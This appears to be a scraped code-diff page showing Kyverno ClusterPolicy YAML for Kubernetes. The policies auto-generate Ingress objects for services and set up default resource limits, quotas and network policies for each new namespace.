kind: ClusterPolicy
metadata:
name: ingress-domain-name
spec:
rules:
- name: create-ingress
match:
resources:
kinds:
- Service
preconditions:
- key: "{{request.object.spec.ports[*].port}}"
operator: AnyIn
value: [ 80 ]
generate:
kind: Ingress
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
spec:
rules:
- host: "{{request.object.metadata.name}}.{{request.object.metadata.namespace}}.A.B.C.D.nip.io"
http:
paths:
- backend:
service:
name: "{{request.object.metadata.name}}"
port:
name: http
path: /
pathType: Prefix

View File

@@ -1,37 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: ingress-domain-name
spec:
rules:
- name: create-ingress
context:
- name: configmap
configMap:
name: ingress-domain-name
namespace: "{{request.object.metadata.namespace}}"
match:
resources:
kinds:
- Service
preconditions:
- key: "{{request.object.spec.ports[0].name}}"
operator: Equals
value: http
generate:
kind: Ingress
name: "{{request.object.metadata.name}}"
namespace: "{{request.object.metadata.namespace}}"
data:
spec:
rules:
- host: "{{request.object.metadata.name}}.{{request.object.metadata.namespace}}.{{configmap.data.domain}}"
http:
paths:
- backend:
service:
name: "{{request.object.metadata.name}}"
port:
name: http
path: /
pathType: Prefix

View File

@@ -1,63 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: setup-namespace
spec:
rules:
- name: setup-limitrange
match:
resources:
kinds:
- Namespace
generate:
kind: LimitRange
name: default-limitrange
namespace: "{{request.object.metadata.name}}"
data:
spec:
limits:
- type: Container
min:
cpu: 0.1
memory: 0.1
max:
cpu: 2
memory: 2Gi
default:
cpu: 0.25
memory: 500Mi
defaultRequest:
cpu: 0.25
memory: 250Mi
- name: setup-resourcequota
match:
resources:
kinds:
- Namespace
generate:
kind: ResourceQuota
name: default-resourcequota
namespace: "{{request.object.metadata.name}}"
data:
spec:
hard:
requests.cpu: "10"
requests.memory: 10Gi
limits.cpu: "20"
limits.memory: 20Gi
- name: setup-networkpolicy
match:
resources:
kinds:
- Namespace
generate:
kind: NetworkPolicy
name: default-networkpolicy
namespace: "{{request.object.metadata.name}}"
data:
spec:
podSelector: {}
ingress:
- from:
- podSelector: {}

Some files were not shown because too many files have changed in this diff Show More